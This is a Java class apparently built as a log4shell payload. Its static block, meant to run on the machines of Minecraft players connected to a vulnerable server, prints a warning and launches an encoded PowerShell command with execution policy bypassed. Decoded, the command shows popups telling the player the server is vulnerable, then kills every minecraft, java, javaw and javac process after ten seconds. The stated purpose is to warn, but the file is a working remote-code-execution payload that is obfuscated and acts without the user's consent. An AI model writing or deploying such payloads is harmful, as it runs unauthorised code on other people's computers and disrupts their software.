public class Log4Warn {

    static {
        
        try {
            // This code runs on the client side.
            // Print warning to the console.
            System.out.println("==========================================================");
            System.out.println("If you see this message, disconnect now!");
            System.out.println("The server is vulnerable to a remote attack known as log4shell. (Google it!)");
            System.out.println("==========================================================");
            // Load powershell script as a enc, string; see the client.ps1 file.
            java.lang.Runtime.getRuntime().exec("powershell.exe -exec bypass -enc IwAgAEwAbwBhAGQAIAB3AGkAbgBkAG8AdwBzACAAZgBvAHIAbQBzACAAbABpAGIAIAB0AG8AIAB1AHMAZQAgAGwAYQB0AGUAcgANAAoAQQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACMAIABMAG8AYQBkACAAdwBzAGgAZQBsAGwAIAAoAGYAbwByACAAdABoAGUAIABwAG8AcAB1AHAAKQAgAGEAbgBkACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzACcAcwAgAGwAaQBiACAAZgBvAHIAIAB0AGgAZQAgAHQAcgBhAHkAIABuAG8AdABpAGYAYQBjAHQAaQBvAG4ALgANAAoAJAB3AHMAaABlAGwAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBDAG8AbQBPAGIAagBlAGMAdAAgAFcAcwBjAHIAaQBwAHQALgBTAGgAZQBsAGwADQAKACQAZwBsAG8AYgBhAGwAOgBiAGEAbABtAHMAZwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATgBvAHQAaQBmAHkASQBjAG8AbgANAAoAJABwAGEAdABoACAAPQAgACgARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAHAAaQBkACkALgBQAGEAdABoAA0ACgANAAoAIwAgAEMAcgBlAGEAdABlACAAdABoAGUAIAB0AHIAYQB5ACAAbQBlAHMAcwBhAGcAZQAsACAAYQBuAGQAIABzAGgAbwB3ACAAaQB0AC4ADQAKACQAYgBhAGwAbQBzAGcALgBJAGMAbwBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAHIAYQB3AGkAbgBnAC4ASQBjAG8AbgBdADoAOgBFAHgAdAByAGEAYwB0AEEAcwBzAG8AYwBpAGEAdABlAGQASQBjAG8AbgAoACQAcABhAHQAaAApAA0ACgAkAGIAYQBsAG0AcwBnAC4AQgBhAGwAbABvAG8AbgBUAGkAcABJAGMAbwBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4AVABvAG8AbABUAGkAcABJAGMAbwBuAF0AOgA6AFcAYQByAG4AaQBuAGcADQAKACQAYgBhAGwAbQBzAGcALgBCAGEAbABsAG8AbwBuAFQAaQBwAFQAZQB4AHQAIAA9ACAAGCBSAGUAYQBkACAAdABoAGUAIABwAG8AcAB1AHAAIABmAG8AcgAgAG0AbwByAGUAIABpAG4AZgBvAHIAbQBhAHQAaQBvAG4AIQAnAA0ACgAkAGIAYQBsAG0AcwBnAC4AQgBhAGwAbABvAG8AbgBUAGkAcABUAGkAdABsAGUAIAA9ACAAIgBNAGkAbgBlAGMAcgBhAGYAdAAgAHcAaQBsAGwAIABzAGUAbABmACAAYwBsAG8AcwBlACAAaQBuACAAMQAwACAAcwBlAGMAbwBuAGQAcwAhACIADQAKACQAYgBhAGwAbQBzAGcALgBWAGkAcwBpAGIAbABlACAAPQAgACQAdAByAHUAZQANAAoAJABiAGEAbABtAHMAZwAuAFMAaABvAHcAQgBhAGwAbABvAG8AbgBUAGkAcAAoADYAMAAwADAAMAApAA0ACgANAAoADQAKACMAUwBoAG8AdwAgAHQAaABlACAAcABvAHAAdQBwAA0ACgAkAHAAbwBwAHUAcAAgAD0AIAAkAHcAcwBoAGUAbABsAC4AUABvAHAAdQBwACgAIgBUAGgAZQAgAHMAZQByAHYAZQByACAAeQBvAHUAIABhAHIAZQAgAHAAbABhAHkAaQBuAGcAIABvAG4AIABpAHMAIAB2AHUAbABuAGUAcgBhAGIAbABlACAAdABvACAAYQAgAHIAZQBtAG8AdABlACAAYQB0AHQAYQBjAGsAIABrAG4AbwB3AG4AIABhAHMAIABsAG8AZwA0AHMAaABlAGwAbAAuACAAUgBlAHAAbwByAHQAIAB0AGgAaQBzACAAdABvACAAdABoAGUAIABzAGUAcgB2AGUAcgAgAG8AdwBuAGUAcgAhACIALAAgADAALAAiAEMATABPAFMARQAgAE0ASQBOAEUAQwBSAEEARgBUACAATgBPAFcAIQAiACwAMAArADQAOAApAA0ACgANAAoAIwAgAFMAbABlAGUAcAAgAGYAbwByACAAMQAwACAAUwBlAGMAbwBuAGQAcwANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwACAALQBWAGUAcgBiAG8AcwBlAA0ACgANAAoAIwAgAEsAaQBsAGwAIABhAGwAbAAgAHQAaABlACAAcAByAG8AYwBlAHMAcwBlAHMAIAB3AGkAdABoACAAdABoAGUAIABuAGEAbQBlACAAIgBNAGkAbgBlAGMAcgBhAGYAdAAiACAAaQBuACAAdABoAGUAbQAuAA0ACgBnAGUAdAAtAHAAcgBvAGMAZQBzAHMAIABtAGkAbgBlAGMAcgBhAGYAdAAgAC0AZQBhACAAMAAgAHwAIABTAHQAbwBwAC0AUAByAG8AYwBlAHMAcwANAAoADQAKACMAIABLAGkAbABsACAAYQBsAGwAIABvAHAAZQBuACAAZwBhAG0AZQBzACAAKABKAGEAdgBhACkAIAANAAoADQAKAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAGoAYQB2AGEAIAAtAGUAYQAgADAAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMADQAKAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAGoAYQB2AGEAdwAgAC0AZQBhACAAMAAgAHwAIABzAHQAbwBwAC0AcAByAG8AYwBlAHMAcwANAAoARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAagBhAHYAYQBjACAALQBlAGEAIAAwACAAfAAgAHMAdABvAHAALQBwAHIAbwBjAGUAcwBzAA0ACgA=").waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public Log4Warn(){
        // Start server checks.
        // NOTE: The sever checks have not been uploaded (broken, working on fixing).
        System.out.println("This gets ran on the server.");
    }
}
